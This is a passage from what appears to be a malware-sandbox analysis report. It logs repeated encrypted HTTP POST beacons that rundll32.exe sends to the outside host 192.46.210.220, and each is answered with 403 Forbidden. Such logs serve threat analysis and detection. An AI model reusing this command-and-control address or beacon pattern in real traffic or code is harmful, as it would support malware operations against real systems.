                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:25 UTC93INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:25 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.349824192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:25 UTC93OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:25 UTC94OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:26 UTC98INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.349754192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:03:52 UTC9OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:03:52 UTC9OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:03:53 UTC19INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:03:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.349832192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:28 UTC98OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:28 UTC98OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:29 UTC103INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:29 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.349834192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:29 UTC103OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:29 UTC103OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:30 UTC108INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.349840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:32 UTC108OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:32 UTC108OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:33 UTC113INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:33 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.349842192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:33 UTC113OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:33 UTC113OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:34 UTC118INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:34 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.349852192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:36 UTC118OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:36 UTC118OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:37 UTC123INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:37 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.349855192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:37 UTC123OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:37 UTC123OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:38 UTC128INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:38 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.349861192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:40 UTC128OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:40 UTC128OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:41 UTC133INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:41 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.349863192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:41 UTC133OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:41 UTC133OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:42 UTC138INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:42 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.349870192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:44 UTC138OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:44 UTC138OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:44 UTC143INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.349872192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:45 UTC143OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:45 UTC143OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:46 UTC148INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:46 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.349756192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:03:53 UTC14OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:03:53 UTC14OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:03:53 UTC19INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:03:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.349878192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:48 UTC148OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
